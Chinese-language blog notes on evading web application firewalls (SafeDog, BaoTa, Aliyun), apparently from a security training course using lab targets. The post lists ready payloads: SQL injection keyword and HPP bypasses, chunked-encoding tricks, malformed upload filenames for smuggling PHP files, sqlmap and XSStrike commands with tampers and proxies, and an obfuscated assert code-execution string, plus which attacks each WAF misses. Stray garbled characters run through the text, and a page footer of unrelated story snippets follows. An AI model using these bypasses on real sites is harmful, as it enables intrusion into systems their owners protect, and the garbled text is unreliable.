2-WAF主要過濾方式及繞過(HPP污染&分塊傳輸&垃圾數(shù)據(jù))

1蟹略、在漏洞發(fā)現(xiàn)中登失,WAF會對三個方向進行過濾攔截:

1、速度流量問題
2科乎、工具的指紋被識別
3壁畸、工具的檢測Poc或Payload

2、WAF攻防-漏洞利用HPP污染&分塊傳輸&垃圾數(shù)據(jù)

1茅茂、SQL注入&文件上傳繞過
2捏萍、XSS跨站&其他漏洞繞過
3、HPP污染&垃圾數(shù)據(jù)&分塊等

安全狗-SQL注入&文件上傳-知識點

SQL注入 https://www.cnblogs.com/cute-puli/p/11146625.html
關鍵字替換
http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 1
http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 12
更換提交方式:
POST id=-1 union select 1,2,3--+
模擬文件上傳 傳遞數(shù)據(jù)
分塊傳輸:更改數(shù)據(jù)請求格式
https://github.com/c0ny1/chunked-coding-converter
HPP參數(shù)污染:id=1/*&id=-1%20union%20select%201,2,3%23/

文件上傳:換行解析&垃圾溢出&%00干擾&=符號干擾&參數(shù)模擬
filename=a.php
filename="a.php
filename="a.php%00"
垃圾數(shù)據(jù);filename="a.php"
無限filename;filename="a.php"
filename=="a.php"
filename="name='uploadfile.php"
filename="Content-Disposition: form-data.php"
filename=="a.ph
p"

BT&Aliyun-SQL注入&文件上傳-知識點

python sqlmap.py -u "http://test.xiaodi8.com/pikachu/vul/sqli/sqli_str.php?name=*&submit=%E6%9F%A5%E8%AF%A2" --random-agent --tamper=rdog.py --proxy="http://tps118.kdlapi.com:15818"
格式替換

BT&Aliyun-文件包含&代碼執(zhí)行-知識點

https://github.com/s0md3v/XSStrike
python xsstrike.py -u "http://test.xiaodi8.com/pikachu/vul/xss/xss_reflected_get.php?message=1&submit=submit" --proxy
txt=y=str_replace('x','','pxhpxinxfo()');assert(y);&submit=%E6%8F%90%E4%BA%A4
文件包含:沒什么好說的就這幾種
..\ ..../ ...\等

安全狗:
注入 xss 文件上傳攔截
rce 文件包含 等其他不攔截

寶塔:
注入 上傳攔截
rce 文件包含 xss等其他不攔截
其中攔截的是關鍵字

aliyun
攔截的CC速度 和 后門 信息收集和權限維持階段攔截
漏洞利用 他不攔截 默認的版本(升級版本沒測試)

WAF PHP環(huán)境 JAVA不支持

最后編輯于
?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末空闲,一起剝皮案震驚了整個濱河市令杈,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌碴倾,老刑警劉巖逗噩,帶你破解...
    沈念sama閱讀 216,692評論 6 501
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異跌榔,居然都是意外死亡异雁,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,482評論 3 392
  • 文/潘曉璐 我一進店門僧须,熙熙樓的掌柜王于貴愁眉苦臉地迎上來纲刀,“玉大人,你說我怎么就攤上這事担平∈景恚” “怎么了?”我有些...
    開封第一講書人閱讀 162,995評論 0 353
  • 文/不壞的土叔 我叫張陵暂论,是天一觀的道長面褐。 經(jīng)常有香客問我,道長取胎,這世上最難降的妖魔是什么展哭? 我笑而不...
    開封第一講書人閱讀 58,223評論 1 292
  • 正文 為了忘掉前任,我火速辦了婚禮扼菠,結(jié)果婚禮上摄杂,老公的妹妹穿的比我還像新娘循榆。我一直安慰自己,他們只是感情好秧饮,可當我...
    茶點故事閱讀 67,245評論 6 388
  • 文/花漫 我一把揭開白布泽篮。 她就那樣靜靜地躺著,像睡著了一般柑船。 火紅的嫁衣襯著肌膚如雪帽撑。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,208評論 1 299
  • 那天亏拉,我揣著相機與錄音,去河邊找鬼及塘。 笑死,一個胖子當著我的面吹牛锐极,可吹牛的內(nèi)容都是我干的笙僚。 我是一名探鬼主播,決...
    沈念sama閱讀 40,091評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼灵再,長吁一口氣:“原來是場噩夢啊……” “哼肋层!你這毒婦竟也來了翎迁?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 38,929評論 0 274
  • 序言:老撾萬榮一對情侶失蹤掂铐,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體爆班,經(jīng)...
    沈念sama閱讀 45,346評論 1 311
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,570評論 2 333
  • 正文 我和宋清朗相戀三年戚嗅,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片懦胞。...
    茶點故事閱讀 39,739評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡凉泄,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出后众,到底是詐尸還是另有隱情颅拦,我是刑警寧澤教藻,帶...
    沈念sama閱讀 35,437評論 5 344
  • 正文 年R本政府宣布,位于F島的核電站括堤,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏悄窃。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,037評論 3 326
  • 文/蒙蒙 一允趟、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧潮剪,春花似錦分唾、人聲如沸抗碰。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,677評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽折砸。三九已至,卻和暖如春睦授,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背去枷。 一陣腳步聲響...
    開封第一講書人閱讀 32,833評論 1 269
  • 我被黑心中介騙來泰國打工删顶, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留竖螃,地道東北人逗余。 一個月前我還...
    沈念sama閱讀 47,760評論 2 369
  • 正文 我出身青樓,卻偏偏與公主長得像录粱,于是被迫代替她去往敵國和親蜀备。 傳聞我的和親對象是個殘疾皇子荒叶,可洞房花燭夜當晚...
    茶點故事閱讀 44,647評論 2 354

推薦閱讀更多精彩內(nèi)容

  • 本文僅作學習記錄,如有侵權些楣,請聯(lián)系刪除!3钭隆! 前言: 冒個泡鹅很,證明自己還在,輸出自己關于waf繞過的積累 SQL注...
    book4yi閱讀 1,990評論 0 4
  • 一邮屁、SQL注入(注入) 1. 利用場景 從攻擊者進行SQL注入的階段來看菠齿,一般分為探測與攻擊兩個階段(p.s.攻擊...
    LizPL閱讀 2,342評論 0 0
  • 本篇文章介紹如何從常規(guī)攻擊的防御能力來評測一款WAF。一共覆蓋了十六種攻擊類型绳匀,每種類型均從利用場景(攻擊操作的目...
    生活的探路者閱讀 1,269評論 0 4
  • 近十年來,WAF 已經(jīng)逐漸發(fā)展成熟是尔,被軟件行業(yè)接受并成為無數(shù)企業(yè)保護應用的不二選擇。很多大型企業(yè)甚至相繼親自設計或...
    OneAPM閱讀 991評論 0 1
  • waf簡介: 網(wǎng)站W(wǎng)AF是一款服務器安全防護軟件,是為IDC運營商抖所、虛擬主機服務商、企業(yè)主機田轧、服務器管理者等用戶提...
    小銀同學阿閱讀 7,752評論 0 1